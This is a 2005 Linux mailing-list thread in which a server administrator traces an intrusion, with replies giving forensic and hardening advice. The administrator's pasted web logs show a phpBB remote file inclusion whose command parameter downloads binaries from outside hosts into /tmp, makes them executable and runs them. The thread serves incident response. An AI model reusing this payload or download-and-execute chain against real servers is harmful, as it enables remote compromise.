[WBEL-users] Port information for 9865 and 44464

Plug N Play plugnplay at grandpacific.ph
Sun Jun 26 22:02:03 CDT 2005


Thank you for all your responses.

Yesterday, I have identified the cause of the intrusion.
It's from my old PHP Nuke installation with PHPBB module included.

I was very careless and unaware that PHPBB will be the source of
Intrusion since this module is not active in the server.

However, the hacker still managed to install the code and run it.
Here is the log I had found.

Hacker-ip - - [14/Jun/2005:00:35:58 -0400] "GET
/modules/Forums/admin/admin_styles.php?phpbb_root_path
=http://www.segfaultbr.hpgvip.ig.com.br/tool25.gif?&cmd=cd%20/tmp;%20wget%20
www.sn4ck3.com/44464;%20chmod%20777%2044464;%20./44464 HTTP/1.1" 2
00 9105
Hacker-ip - - [14/Jun/2005:00:36:31 -0400] "GET
/modules/Forums/admin/admin_styles.php?phpbb_root_path
=http://www.segfaultbr.hpgvip.ig.com.br/tool25.gif?&cmd=cd%20/tmp;wget%20htt
p://www.ciget.com.ve/.0/bindz;%20chmod%20777%20bindz;./bindz HTTP/
1.1" 200 9135
Hacker-ip - - [14/Jun/2005:00:37:01 -0400] "GET
/modules/Forums/admin/admin_styles.php?phpbb_root_path
=http://www.segfaultbr.hpgvip.ig.com.br/tool25.gif?&cmd=cd%20/tmp;%20wget%20
paginas.terra.com.br/informatica/fdl/cgi;%20chmod%20777%20cgi;%20.
/cgi HTTP/1.1" 200 9209

Ok, from here, the hacker installed 3 malicious program namely
44464, bindz and cgi.

My question is, what harm will this three program (44464, bindz and cgi)
do within my server?

I tried to locate them but they were gone and not anymore listening to any
port.

Any information would be very much appreciated.

Thank you again,
Marc

-----Original Message-----
From: whitebox-users-bounces at beau.org
[mailto:whitebox-users-bounces at beau.org] On Behalf Of Johnny Hughes
Sent: Friday, June 24, 2005 5:47 PM
To: WhiteBox Users
Subject: Re: [WBEL-users] Port information for 9865 and 44464

On Fri, 2005-06-24 at 01:50 -0700, Benjamin Smith wrote:
> I hafta admit: it doesn't look good. 
> 
> A few things to try: 
> 
> lsof | less 
> (look thru the list, see if anything jumps out at you. It's a LONG list) 
> 
> netstat -ln 
> (helps you see why the ports are open) 
> 
> Don't forget chkrootkit (google for it) 
> 
> Other things: do a `find / -iname \.\*` to find "dot" (hidden) files. Look

> thru /tmp closely. Look thru /var/log/messages, /var/log/httpd/error_log
and 
> any other HTTPD log files. If you can find out approx. when a compromise
took 
> place, use find with the "mtime" and "ctime" options to find any files 
> created within a day or so of that initial hack. 
> 
> More info from a honeypot project: 
> http://www.honeynet.org/scans/scan29/sol/ydjemaiel/Answers.html
> 
> Best of luck, 
> 
> -Ben 
> 
> 
> 
> On Friday 24 June 2005 01:32, Plug N Play wrote:
> > Dear WBL Users,
> > 
> > Greetings,
> > 
> > Today, I have discovered two new high ports opened from my server. Port
9865
> > and 44464 are both opened and listening to outside. Would anyone happen
to
> > know or have idea that you can share regarding this two ports?
> > 
> > Also I tried to telnet them (telnet localhost 9865 or 44464) and it
gives me
> > a (sh-2.05b$). Could this mean a hacker has setup a backdoor? or I'm
already
> > being compromised?
> > 
> > Any information would be very much appreciated.
> > 
> > Thank you,
> > Marc

If you telnet to the port and get a bash prompt, it is almost guaranteed
that you are hacked and have trojans listening on that port.

Use the command:

netstat -aptn

it will tell you open ports and what program has them open.

It is possible that these ports will not show up if there has been a
root kit that replaces lsof (it will also so what program uses which
port) or netstat.

you can use the command:

rpm -Vv net-tools

and

rpm -Vv lsof

You should see 8 dots, a blank space (or c for config file and d
document), and all the files listed similar to this (for lsof on
CentOS-4):

--------------------------------------------
[root at centosj i386]# rpm -Vv lsof
........    /usr/sbin/lsof
........    /usr/share/doc/lsof-4.72
........  d /usr/share/doc/lsof-4.72/00.README.FIRST
........  d /usr/share/doc/lsof-4.72/00.README.FIRST_4.72
........  d /usr/share/doc/lsof-4.72/00CREDITS
........  d /usr/share/doc/lsof-4.72/00DCACHE
........  d /usr/share/doc/lsof-4.72/00DIALECTS
........  d /usr/share/doc/lsof-4.72/00DIST
........  d /usr/share/doc/lsof-4.72/00FAQ
........  d /usr/share/doc/lsof-4.72/00LSOF-L
........  d /usr/share/doc/lsof-4.72/00MANIFEST
........  d /usr/share/doc/lsof-4.72/00PORTING
........  d /usr/share/doc/lsof-4.72/00QUICKSTART
........  d /usr/share/doc/lsof-4.72/00README
........  d /usr/share/doc/lsof-4.72/00TEST
........  d /usr/share/doc/lsof-4.72/00XCONFIG
........  d /usr/share/man/man8/lsof.8.gz
--------------------------------------------------------

If any of the dots are replace with letters, something about that file
has changed since install from the RPM ... see "man rpm" in the "Verify
Options" for details

Root Kits will replace executables with other ones that don't show the
rogue processes or ports as open ... also check here for ports tied to
specific treats:

http://isc.sans.org/

It is critical that all updates be done in a timely manner for all
internet facing machines ... or at least that you run a good iptables
firewall on internet facing machines that only allows connections that
are necessary.

-- Johnny Hughes
<http://www.CentOS.org>




-- 
No virus found in this outgoing message.
Checked by AVG Anti-Virus.
Version: 7.0.323 / Virus Database: 267.8.1/28 - Release Date: 6/24/2005



More information about the Whitebox-users mailing list